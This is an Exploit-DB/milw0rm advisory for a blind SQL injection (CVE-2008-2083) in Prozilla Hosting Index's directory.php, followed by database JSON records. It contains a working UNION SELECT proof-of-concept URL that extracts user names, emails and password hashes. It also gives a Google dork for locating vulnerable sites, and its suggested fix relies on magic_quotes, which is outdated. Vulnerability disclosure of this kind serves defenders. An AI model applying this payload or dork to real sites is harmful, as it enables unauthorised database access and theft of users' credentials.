Prozilla Hosting Index directory.php cat_id - SQL Injection Vulnerability
2008-04-28T00:00:00
ID EDB-ID:5516 Type exploitdb Reporter K-159 Modified 2008-04-28T00:00:00
Description
Prozilla Hosting Index (directory.php cat_id) SQL Injection Vulnerability. CVE-2008-2083. Webapps exploit for php platform
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_88$2008
-----------------------------------------------------------------------------------------
[ECHO_ADV_88$2008] Prozilla Hosting Index (directory.php cat_id) Blind Sql Injection Vulnerability
-----------------------------------------------------------------------------------------
Author : M.Hasran Addahroni
Date : April, 28 th 2007
Location : Jakarta, Indonesia
Web : http://advisories.echo.or.id/adv/adv88-K-159-2008.txt
Critical Lvl : Medium
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Hosting Index
version : unknown
Vendor : http://www.prozilla.com/item.php?item=26
Description :
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
Input passed to the "cat_id" parameter in directory.php is not properly verified before being used to sql query.
This can be exploited thru the browser and get the hash md5 password from users.
Successful exploitation requires that "magic_quotes" is off
Poc/Exploit:
~~~~~~~~~
http://www.target.com/[hostindex_path]/directory.php?ax=list&sub=7&cat_id=-1%20union%20select%201,2,concat(id,0x3a,name,0x3a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14%20from%20links--
Dork:
~~~~
Google: "inurl:directory.php?ax=list" Hosting Directory
Solution:
~~~~~~
- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
Timeline:
~~~~~~~~
- 15 - 12 - 2007 bug found
- 28 - 04 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~
~ ping - my dearest wife, zautha my light of eyes, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,fuzk3_k3ndi,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ SinChan,h4ntu,cow_1seng,poniman_coy, ketut, rizal, cR4SH3R, kuntua, stev_manado, nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
~ special for rgod - good bye mate, thanks for the great works.
---------------------------------------------------------------------------
Contact:
~~~~~
K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://k-159.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
# milw0rm.com [2008-04-28]
{"id": "EDB-ID:5516", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Prozilla Hosting Index directory.php cat_id - SQL Injection Vulnerability", "description": "Prozilla Hosting Index (directory.php cat_id) SQL Injection Vulnerability. CVE-2008-2083. Webapps exploit for php platform", "published": "2008-04-28T00:00:00", "modified": "2008-04-28T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5516/", "reporter": "K-159", "references": [], "cvelist": ["CVE-2008-2083"], "lastseen": "2016-01-31T22:13:43", "viewCount": 6, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-01-31T22:13:43", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2083"]}], "modified": "2016-01-31T22:13:43", "rev": 2}, "vulnersScore": 7.3}, "sourceHref": "https://www.exploit-db.com/download/5516/", "sourceData": "____________________ ___ ___ ________\n\\_ _____/\\_ ___ \\ / | \\\\_____ \\ \n | __)_ / \\ \\// ~ \\/ | \\ \n | \\\\ \\___\\ Y / | \\\n/_______ / \\______ /\\___|_ /\\_______ /\n \\/ \\/ \\/ \\/ \n\n .OR.ID\nECHO_ADV_88$2008\n\n-----------------------------------------------------------------------------------------\n[ECHO_ADV_88$2008] Prozilla Hosting Index (directory.php cat_id) Blind Sql Injection Vulnerability\n-----------------------------------------------------------------------------------------\n\nAuthor : M.Hasran Addahroni\nDate : April, 28 th 2007\nLocation : Jakarta, Indonesia\nWeb : http://advisories.echo.or.id/adv/adv88-K-159-2008.txt\nCritical Lvl : Medium\nImpact\t : System access\nWhere\t : From Remote\n---------------------------------------------------------------------------\n\nAffected software description:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nApplication : Hosting Index\nversion : unknown\nVendor : http://www.prozilla.com/item.php?item=26\nDescription :\n\n\n---------------------------------------------------------------------------\n\nVulnerability:\n~~~~~~~~~~~~~\n\nInput passed to the \"cat_id\" parameter in directory.php is not properly verified before being used to sql query. \nThis can be exploited thru the browser and get the hash md5 password from users.\nSuccessful exploitation requires that \"magic_quotes\" is off\n\n\nPoc/Exploit:\n~~~~~~~~~\n\nhttp://www.target.com/[hostindex_path]/directory.php?ax=list&sub=7&cat_id=-1%20union%20select%201,2,concat(id,0x3a,name,0x3a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14%20from%20links--\n\nDork:\n~~~~\nGoogle: \"inurl:directory.php?ax=list\" Hosting Directory\n\nSolution:\n~~~~~~\n\n- Edit the source code to ensure that input is properly verified.\n- Turn on magic_quotes in php.ini\n \n\nTimeline:\n~~~~~~~~\n\n- 15 - 12 - 2007 bug found\n- 28 - 04 - 2008 advisory released\n---------------------------------------------------------------------------\n\nShoutz:\n~~~~\n~ ping - my dearest wife, zautha my light of eyes, for all the luv the tears n the breath\n~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke\n~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,fuzk3_k3ndi,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b\n~ SinChan,h4ntu,cow_1seng,poniman_coy, ketut, rizal, cR4SH3R, kuntua, stev_manado, nofry,k1tk4t,0pt1c\n~ newbie_hacker@yahoogroups.com\n~ #aikmel #e-c-h-o @irc.dal.net\n~ special for rgod - good bye mate, thanks for the great works.\n\n---------------------------------------------------------------------------\nContact:\n~~~~~\n\n K-159 || echo|staff || eufrato[at]gmail[dot]com\n Homepage: http://k-159.echo.or.id/\n\n-------------------------------- [ EOF ] ----------------------------------\n\n# milw0rm.com [2008-04-28]\n", "osvdbidlist": ["44655"]}
{"cve": [{"lastseen": "2020-10-03T11:50:59", "description": "SQL injection vulnerability in directory.php in Prozilla Hosting Index, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in a list action.", "edition": 3, "cvss3": {}, "published": "2008-05-05T17:20:00", "title": "CVE-2008-2083", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2083"], "modified": "2018-10-11T20:39:00", "cpe": ["cpe:/a:prozilla:hosting_index:*"], "id": "CVE-2008-2083", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2083", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:prozilla:hosting_index:*:*:*:*:*:*:*:*"]}]}